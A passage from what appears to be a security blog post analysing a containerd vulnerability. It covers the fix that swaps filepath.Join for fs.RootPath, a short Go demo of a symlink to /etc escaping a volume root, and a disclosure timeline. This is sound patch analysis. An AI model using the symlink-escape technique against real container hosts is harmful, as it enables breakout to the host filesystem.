func (c *containersClient) Create(ctx context.Context, in *CreateContainerRequest, opts ...grpc.CallOption) (*CreateContainerResponse, error) {
    out := new(CreateContainerResponse)
    err := c.cc.Invoke(ctx, "/containerd.services.containers.v1.Containers/Create", in, out, opts...)
    if err != nil {
        return nil, err
    }
    return out, nil
}

VIII. Fix Analysis

1. Commit analysis

According to the GitHub security advisory GHSA-crp2-qrr5-8pq7, the fixed versions are 1.6.1, 1.5.10, and 1.4.13, so we can compare each fixed version against the previous one.

https://github.com/containerd/containerd/compare/v1.6.0...v1.6.1

There are only 7 commits in the diff, so the fix commit can be quickly identified as:

https://github.com/containerd/containerd/commit/075cfdff68941fe30338ebe034fa67ce09fb4b55

    for _, mountPath := range mountPaths {
-       src := filepath.Join(mountPath, volume)
+       src, err := fs.RootPath(mountPath, volume)
+       if err != nil {
+           return fmt.Errorf("rootpath on mountPath %s, volume %s: %w", mountPath, volume, err)
+       }
        if _, err := os.Stat(src); err != nil {
            if os.IsNotExist(err) {
                // Skip copying directory if it does not exist.

The fix touches a single point: the path-joining function is changed from filepath.Join to fs.RootPath.

filepath.Join is the path-joining function provided by Go's standard library; it only joins (and lexically cleans) the paths and performs no validation.

The fs.RootPath() function adds the following safeguards:

  1. It recursively resolves symlinks until the path no longer contains one, and only then performs the join.
  2. It prevents directory traversal during the join.

https://github.com/containerd/containerd/blob/v1.6.1/vendor/github.com/containerd/continuity/fs/path.go#L227

// RootPath joins a path with a root, evaluating and bounding any
// symlink to the root directory.
func RootPath(root, path string) (string, error) {
    if path == "" {
        return root, nil
    }
    var linksWalked int // to protect against cycles
    for {
        i := linksWalked
        newpath, err := walkLinks(root, path, &linksWalked)
        if err != nil {
            return "", err
        }
        path = newpath
        if i == linksWalked {
            newpath = filepath.Join("/", newpath)
            if path == newpath {
                return filepath.Join(root, newpath), nil
            }
            path = newpath
        }
    }
}

The analysis of the walkLinks function is omitted here.

https://github.com/containerd/containerd/blob/v1.6.1/vendor/github.com/containerd/continuity/fs/path.go#L279

Thus, after the fix, even if the volume path is a symlink, it is confined under mountPath; that is the meaning of "Root" in the name fs.RootPath().
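
The contrast between the two functions can be demonstrated with a small sketch (my own illustration, assuming github.com/containerd/continuity/fs is available as a dependency):

package main

import (
    "fmt"
    "os"
    "path/filepath"

    "github.com/containerd/continuity/fs"
)

func main() {
    root, err := os.MkdirTemp("", "rootfs")
    if err != nil {
        panic(err)
    }
    defer os.RemoveAll(root)

    // Malicious volume path: a symlink out to the host's /etc.
    if err := os.Symlink("/etc", filepath.Join(root, "volume")); err != nil {
        panic(err)
    }

    // Vulnerable join: purely lexical, so the symlink escapes at copy time,
    // and ".." components are cleaned right through the root.
    fmt.Println(filepath.Join(root, "/volume"))   // <root>/volume, which points at /etc
    fmt.Println(filepath.Join(root, "../../etc")) // a path outside root entirely

    // Fixed join: the symlink is resolved and re-rooted, traversal is bounded.
    safe, err := fs.RootPath(root, "/volume")
    fmt.Println(safe, err) // <root>/etc, nil
}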

IX. Timeline

Timeline of the vulnerability's introduction, discovery, reporting, fix, and analysis:

  • 2021-11-22: Felix Wilhelm reports the vulnerability to containerd
  • 2022-02-18: containerd requests an extension of the disclosure deadline to March 7
  • 2022-03-03: containerd completes the fix and publishes the advisory on GHSA
  • 2022-03-04: I pick up the vulnerability intelligence while manually reviewing GHSA
  • 2022-03-07: I finish reproducing the vulnerability
  • 2022-03-24: Google Project Zero publishes the vulnerability report upon reaching the 90+30-day deadline
  • 2022-03-26: I finish the main analysis; most of the time went into the call chain analysis
  • 2022-03-29: this article is published on my blog
  • 2022-04-27: this article is published on my WeChat official account